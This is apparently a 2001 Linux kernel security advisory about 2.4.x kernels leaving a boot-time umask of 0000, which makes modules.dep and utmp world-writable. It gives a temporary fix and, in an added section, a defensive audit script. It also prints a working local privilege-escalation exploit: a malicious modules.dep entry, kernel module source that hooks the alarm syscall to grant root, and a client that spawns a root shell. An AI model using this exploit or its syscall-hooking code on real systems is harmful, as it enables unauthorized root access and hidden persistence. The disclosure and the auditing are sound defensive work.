I posted this to the linux kernel mailing list last Friday, July 13th 2001:

Submitted by  : Josh (josh@pulltheplug.com), lockdown (lockdown@lockeddown.net) on July 16th, 2001
Vulnerability : /lib/modules/2.4.5/modules.dep
Tested On     : Slackware 8.0, 2.4.5
Local         : Yes
Remote        : No
Temporary Fix : umask 022 at the top of all your startup scripts
Target        : root
Big thanks to : slider, lamagra, zen-parse
Greets to     : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it, cryptix, s0ttle, xphantom, qtip, tirancy, Loki, falcon-networks.com.

The 2.4.x kernels starting with 2.4.3 (I think) have, after load, left a umask of 0000. This forces any files created in the bootup scripts, without the command `umask 022` issued, to be world writeable. In Slackware, such files include /var/run/utmp and /var/run/gpm.pid.

This same vulnerability is responsible for creating /lib/modules/`uname -r`/modules.dep world writeable. With this file world writeable, all an intruder need do is put something like the following in /lib/modules/`uname -r`/modules.dep, assuming the system's startup scripts modprobe lp:

    /lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o
    /tmp/alarm.o:

where the alarm.o module is:

    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    extern void* sys_call_table[];

    unsigned int (*old_alarm) (unsigned int seconds);
    unsigned int hacked_alarm (unsigned int seconds);

    unsigned int hacked_alarm(unsigned int seconds)
    {
        if(seconds == 454) {
            current->uid = 0;
            current->euid = 0;
            current->gid = 0;
            current->egid = 0;
            return 0;
        }
        return old_alarm(seconds);
    }

    int init_module(void)
    {
        old_alarm = sys_call_table[SYS_alarm];
        sys_call_table[SYS_alarm] = hacked_alarm;
        return 0;
    }

    void cleanup_module(void)
    {
        sys_call_table[SYS_alarm] = old_alarm;
    }

make a client:

    #include
    #include

    int main(void)
    {
        alarm(454);
        execl("/bin/sh", "sh", NULL);
    }

which will, when the module is loaded, execute a shell as root.
And of course, with /var/run/utmp writeable, users can delete or otherwise manipulate their logins as they appear in w/who/finger/getlogin(), etc.
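As an added example (not part of the original post), the following shell script shows the mechanism and the checks a defender would want on an affected box: it creates a file under umask 0000 and under umask 022 to show the resulting modes, lists world-writable regular files under a directory (the audit to run against /lib/modules and /var/run), and flags lines in a modules.dep-style file whose dependencies point outside the modules tree. All paths are constructed under a temporary directory; the function names, the assumed "module: dep dep ..." line layout, and the use of GNU `find -perm -o=w` and `stat -c '%a'` are my choices, not anything from the post.

```shell
#!/bin/sh
# Added example, not code from the original post. Reproduces the effect of
# an inherited umask 0000 on files a startup script creates, audits a tree
# for world-writable files, and checks a modules.dep-style file for
# dependency paths outside the modules root. Everything runs inside a
# temporary directory; the real /lib/modules and /var/run are not touched.

# Print the regular files under $1 whose mode grants write to "other".
# (GNU find syntax for the symbolic -perm test.)
find_world_writable() {
    find "$1" -type f -perm -o=w 2>/dev/null | sort
}

# Print each line of the modules.dep-style file $1 that lists a dependency
# outside the expected modules root $2 (e.g. /lib/modules/2.4.5).
# Assumed layout: "<module>: <dep> <dep> ..." as quoted in the post.
check_modules_dep() {
    dep_file=$1
    root=$2
    awk -v root="$root" '
        /:/ {
            split($0, parts, ":")
            n = split(parts[2], deps, " ")
            for (i = 1; i <= n; i++)
                if (index(deps[i], root "/") != 1)
                    print $0
        }' "$dep_file"
}

# Simulate a boot script creating a file under umask $2 inside $1 and
# return the resulting permission bits in octal (GNU stat).
mode_created_under_umask() {
    dir=$1
    mask=$2
    (umask "$mask"; : > "$dir/file_$mask")
    stat -c '%a' "$dir/file_$mask"
}

demo() {
    work=$(mktemp -d)
    mkdir -p "$work/modules"
    # Constructed dependency file: one sane line and one that pulls a
    # module from /tmp, the pattern the post describes.
    (umask 022; cat > "$work/modules/modules.dep" <<EOF
$work/modules/kernel/drivers/char/lp.o: $work/modules/kernel/drivers/parport/parport.o
$work/modules/kernel/drivers/net/dummy.o: /tmp/evil.o
EOF
    )
    echo "umask 0000 -> mode $(mode_created_under_umask "$work" 0000)"
    echo "umask 0022 -> mode $(mode_created_under_umask "$work" 0022)"
    echo "world-writable files:"
    find_world_writable "$work"
    echo "suspicious modules.dep lines:"
    check_modules_dep "$work/modules/modules.dep" "$work/modules"
    rm -rf "$work"
}

demo
```

The file created under umask 0000 comes out 666 while the one under 022 comes out 644, which is exactly why the post's temporary fix of putting `umask 022` at the top of every startup script works. Running `find_world_writable /lib/modules` and `find_world_writable /var/run` after boot is the quick way to confirm whether a given system was affected.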